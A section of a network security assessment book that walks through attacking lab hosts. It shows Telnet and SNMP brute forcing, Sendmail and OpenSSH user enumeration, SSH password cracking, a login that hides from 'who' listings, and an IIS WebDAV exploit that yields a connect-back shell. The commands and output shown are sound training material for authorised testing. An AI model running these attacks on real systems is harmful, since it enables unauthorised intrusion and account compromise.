14.4 Network Service Testing


After investigating the potential low-level weaknesses within each accessible network service, I launch exploit scripts and attack techniques against each service to qualify and test the vulnerabilities.

14.4.1 Cisco IOS Router (192.168.10.1)

The router is susceptible to brute-force attack through its Telnet and SNMP services. A full-blown brute-force attack (which often takes days to complete) should be launched if initial brute-force attacks, using obvious common passwords, fail. Example 14-17 shows hydra in use to brute-force the Cisco IOS Telnet service password, using a list of default Cisco passwords from pass.txt.

Example 14-17. Performing initial Telnet brute force using Hydra
# cat pass.txt cisco enable admin changeme system !cisco Cisco c cc # ./hydra -P pass.txt -e ns 192.168.10.1 cisco Hydra v2.4 (c) 2003 by van Hauser / THC - use allowed only for legal purposes. Hydra is starting! [parallel tasks: 4, login tries: 11 (l:1/p:11)] Hydra finished.

ADMsnmp is used to brute-force SNMP service read or write community strings of the router, as shown in Example 14-18.

Example 14-18. Performing initial SNMP brute force using ADMsnmp
# ./ADMsnmp 192.168.10.1 ADMsnmp vbeta 0.1 (c) The ADM crew ftp://ADM.isp.at/ADM/ greets: !ADM, el8.org, ansia >>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>> >>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>> >>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>> >>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>> >>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>> >>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>> >>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>> >>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>> >>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>> >>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>> >>>>>>>>>>> get req name=enable  id = 32 >>>>>>>>>>> >>>>>>>>>>> get req name=read  id = 35 >>>>>>>>>>> >>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>> >>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>> >>>>>>>>>>> get req name=cable-docsis  id = 43 >>>>>>>>>>> >>>>>>>>>>> get req name=ILMI  id = 45 >>>>>>>>>>> <!ADM!>         snmp check on 192.168.10.1       <!ADM!>

Unfortunately, this initial Telnet and SNMP brute-force testing reveals that no common or default passwords are in use on this router. I could launch a full-blown brute-force attacks against these services if I were desperate to compromise this device (which can take weeks to complete , depending on the size of the dictionary).

14.4.2 Solaris Mail Server (192.168.10.10)

No public exploit tools were found for the issues listed in MITRE CVE relating to Sendmail and OpenSSH services running on Solaris. In this case, there are three remote attacks that can be launched against the server.

  • Enumeration of local user accounts through Sendmail

  • Enumeration of local user accounts through OpenSSH (abusing CVE-2003-0190)

  • Brute force of weak user passwords through OpenSSH

Example 14-19 shows the rcpt2 tool (http://examples.oreilly.com/networksa/tools/rcpt2.c) in use against the Sendmail service, to identify local user accounts through multiple crafted RCPT TO: requests.

Example 14-19. Enumerating usernames through Sendmail
# ./rcpt2 users.txt 192.168.10.10 rcpt2 by B-r00t. (c) 2003. Usernames from: users.txt RCPT TO username enumeration on 192.168.10.10. BANNER: 220 mail ESMTP Sendmail 8.11.6+Sun/8.11.6; Thu, 20 Nov 2003 SEND: HELO doris.scriptkiddie.net RECV: 250 mail Hello hacker [10.0.0.10], pleased to meet you SENT: mail from:<hax0r@doris.scriptkiddie.net> RECV: 250 2.1.0 <hax0r@doris.scriptkiddie.net>... Sender ok VALID_USER: root VALID_USER: sybase Sending RSET & QUIT to 192.168.10.10 Ok Done!

Here I've identified the user accounts of root, and sybase. Example 14-20 shows how to launch a similar attack against the OpenSSH service, using ssh_brute.

Example 14-20. Downloading, building, and using ssh_brute
# wget ftp://sunsite.cnlab-switch.ch/pub/OpenBSD/OpenSSH/portable/ openssh-3.6.1p1.tar.gz # tar xfz openssh-3.6.1p1.tar.gz # wget http://examples.oreilly.com/networksa/tools/ssh_brute.tgz # tar xvfz ssh_brute.tgz openssh-3.6.1p1_brute.diff ssh_brute.c # patch -p0 <openssh-3.6.1p1_brute.diff patching file openssh-3.6.1p1/ssh.c patching file openssh-3.6.1p1/sshconnect.c patching file openssh-3.6.1p1/sshconnect1.c patching file openssh-3.6.1p1/sshconnect2.c # cd openssh-3.6.1p1 # ./configure # make # cc ../ssh_brute.c -o ssh_brute # ./ssh_brute  SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool  Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved  Usage: ./ssh_brute <protocol version> <user file> <host> # make ssh # ./ssh_brute 2 users.txt 192.168.10.10  SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool  Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved  Testing an illegal user        : 0 second(s)  Testing login root             : USER OK       [8 second(s)]  Testing login test             : ILLEGAL       [0 second(s)]  Testing login admin            : ILLEGAL       [0 second(s)]  Testing login sybase           : USER OK       [7 second(s)]  Testing login oracle           : ILLEGAL       [1 second(s)]  Testing login informix         : ILLEGAL       [0 second(s)]

After identifying one interesting non-standard user account in particular (sybase), I proceed to use the TESO guess-who brute-force utility to grind the user password through the accessible SSH service. Example 14-21 shows the package being downloaded, built, and run.

Example 14-21. Installing and using guess-who
# wget http://packetstormsecurity.nl/groups/teso/guess-who-0.44.tgz # tar xfz guess-who-0.44.tgz # cd guess-who # make # ./b guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads]            [-n ntries] Use -1 for producer/consumer thread model, -2 for dumb parallelism. Passwds go on stdin. :) # ./b -l sybase -h 192.168.10.10 -1 < pass.txt (!)128 ][ 00131 ][ 00000000.599880 ][   sybase ][        letmein ]

After 128 attempts, the tool finds that the user password is letmein. I can proceed to use ssh to authenticate and connect to the host, with the -T option to provide a level of cloaking (so that I don't appear in who listings, etc.):

# ssh -l sybase -T 192.168.10.10 csh -i sybase@192.168.10.10's password: letmein Warning: no access to tty (Bad file descriptor). Thus no job control in this shell. mail% who mail% id uid=508(sybase) gid=509(sybase) groups=509(sybase)

14.4.3 Windows 2000 Web Server (192.168.10.25)

Vulnerabilities fall into two categories: simple logic flaws and memory manipulation bugs. Two of the seven relevant remote issues relating to IIS 5.0 are simple logic flaws that rely on Unicode and double-encoding of characters to perform directory traversal. The remaining five are memory manipulation bugs, which use buffer overflows to influence logical program flow on the remote server.

The Unicode and double-encoding directory traversal bugs (CVE-2000-0884 and CVE-2001-0333) can be identified using an automated web scanner, such as nikto or N-Stealth. By analyzing the results, I find that the server isn't susceptible to these issues.

The existence and scope of memory manipulation bugs can be fully qualified only by launching exploit scripts and proof-of-concept tools to solicit a positive response (such as an interactive command shell or a directory listing). It may be the case that, even though the server is vulnerable to a given bug, egress filtering of traffic prevents connect-back shellcode from working.

In the case of the IIS 5.0 web service at 192.168.10.25, the exploit scripts for the following bugs weren't successful:

  • .printer overflow

  • .ida and .idq overflow

  • .asp chunked encoding overflow

When running the KaHT exploit script to test for the presence of the ntdll.dll IIS WebDAV overflow, I see a positive response, as shown in Example 14-22.

Example 14-22. Using KaHT to compromise the IIS 5.0 server
D:\KaHT_public> KaHT 10.0.0.10 53 0 192.168.10.25 . .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...  Checking Servers.   IP                 Connect IIS 5.0 WEBDAV  Connecting to host: 192.168.10.25...   [OK]    [OK]    [OK]  [+] Aceptando conexiones en el puerto 53  [+] Lets go dude =)  [+] 1 Unhacked Servers Remaining  [+] Trying Ip: 192.168.10.25      Ret=0x00c000c0  [+] Trying Ip: 192.168.10.25      Ret=0x00c200c2  [+] Incoming Conection from 192.168.10.25 accepted  [+] Press Enter to Continue. type "exit" to return to scan Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.   C:\WINNT\system32>


Network Security Assessment
Network Security Assessment: Know Your Network
ISBN: 059600611X
EAN: 2147483647
Year: 2006
Pages: 166
Authors: Chris McNab

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net